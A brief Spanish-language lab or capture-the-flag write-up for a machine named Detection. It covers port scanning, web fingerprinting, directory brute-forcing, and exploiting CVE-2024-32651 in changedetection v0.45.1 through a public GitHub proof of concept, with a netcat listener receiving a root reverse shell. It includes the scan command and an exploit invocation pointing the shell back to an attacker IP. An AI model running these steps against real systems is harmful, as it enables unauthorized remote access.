MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
Last updated
Last updated
Realice un escaneo de puertos con NMAP.
nmap -A --min-rate 3000 -Pn 192.168.163.97 -oN Basicscan.txt
Puertos abiertos 22 ssh y 5000 http
Puerto 5000 http >> http-title "Change Detection" .
Use whatweb para ver las tecnologías de la web.
Pase a hacer un reconocimiento de la pagina web.
Con feroxbuster realice una búsqueda de directorios ocultos.
En su lado derecho puedo ver una versión de la aplicación web changedetecion > v 0.45.1
Con la herramienta searchsploit encontré un exploit para esta versión.
searchsploit 'change detection'
Al verificar que tiene una vulnerabilidad RCE, busque en google otro exploit en github encontrando lo siguiente.
https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE.git
Utilice la prueba de concepto de este exploit para poder ejecutarlo. En otra terminal me puse a la escucha con netcat.
Una vez que ejecute el exploit logre el acceso remoto a la maquina como usuario root.
whatweb
python3 exploit.py --url
--port 80 --ip 192.168.45.159